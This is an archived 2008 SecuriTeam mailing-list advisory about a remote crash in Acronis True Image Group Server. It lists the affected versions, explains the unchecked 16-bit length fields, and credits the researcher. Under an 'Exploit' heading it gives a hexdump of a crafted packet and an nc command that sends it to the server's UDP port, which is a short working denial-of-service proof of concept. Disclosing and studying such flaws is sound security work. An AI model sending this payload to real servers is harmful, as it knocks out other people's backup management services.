[NT] Acronis True Image Group Server Invalid Memory Access
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 10 Mar 2008 17:43:36 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Acronis True Image Group Server Invalid Memory Access
------------------------------------------------------------------------
SUMMARY
<http://www.acronis.com/enterprise/products/ATIES/group-server.html>
Acronis Group Server is a component of Acronis True Image Echo Server
(Workstation and Enterprise packages) which "allows the viewing and
managing of backup tasks for all systems in the network from the Acronis
Management Console". A vulnerability in the way the Acronis True Image
Group Server handles network based data allows remote attackers to cause
the product to crash.
DETAILS
Vulnerable Systems:
* Acronis True Image Group Server version 1.5.19.191
* Acronis True Image Enterprise Server version 9.5.0.8072
The packets used by this server contain some 16 bit fields which specify
the length of the subsequent data. The problem is that the memory assigned
for each packet is about 2048 bytes so the server allocates the amount of
memory specified by that field and then tries to copy the data from the
packet into this new buffer with the subsequent crash of the service due
to the invalid read access.
Exploit:
The following hexdump will cause the server to crash:
0000000 ffff 0001 ffff ffff ffff ffff 0029 ffff
0000010 002a 0000 ffff ffff ffff ffff ffff ffff
0000020 ffff ffff ffff ffff ffff ffff ffff ffff
*
0000800
When sent with the following command:
nc SERVER 9877 -v -v -u -p 9876 < acrogroup.txt
ADDITIONAL INFORMATION
The information has been provided by <mailto:aluigi@xxxxxxxxxxxxx> Luigi
Auriemma.
The original article can be found at:
<http://aluigi.altervista.org/adv/acrogroup-adv.txt>
http://aluigi.altervista.org/adv/acrogroup-adv.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NT] MailEnable Professional/Enterprise Multiple Vulnerabilities
- Next by Date: [NT] NULL pointer in Acronis True Image Windows Agent
- Previous by thread: [NT] MailEnable Professional/Enterprise Multiple Vulnerabilities
- Next by thread: [NT] NULL pointer in Acronis True Image Windows Agent
- Index(es):
Relevant Pages
- [NT] NULL pointer in Acronis True Image Windows Agent
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Acronis Agent is "an essential
component of Acronis True Image Echo Server ... The Acronis True Image Windows Agent
must be not confused with the Acronis ... (Securiteam) - Re: [Full-disclosure] Invalid memory access in Acronis True Image Group Server 1.5.19.191
... but why no fix ??? ... Acronis True Image Group Server ... Acronis
Group Server is a component of Acronis True Image Echo Server ... (Full-Disclosure) - [NT] Multiple Vulnerabilities in HP Web JetAdmin (Read, Write, Execute, Path Disclosure, Password De
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... HP Web JetAdmin is an enterprise
management system for large amounts of HP ... The web server is a modular service ...
HP Web JetAdmin uses it's own encryption. ... (Securiteam) - [NEWS] Multiple Vulnerabilities in Oracle Database (Character Conversion, Extproc, Password Disclosu
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Multiple vulnerabilities were
discovered in the (Oracle database server ... password is required to exploit this vulnerability.
... (Securiteam) - [NEWS] ColdFusion MX Oversize Error Message DoS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... ColdFusion MX "is the solution
for building and deploying powerful web ... shoots up and stays there until the server
completes writing the error ... a long string of data as a GET or POST request to ...
(Securiteam)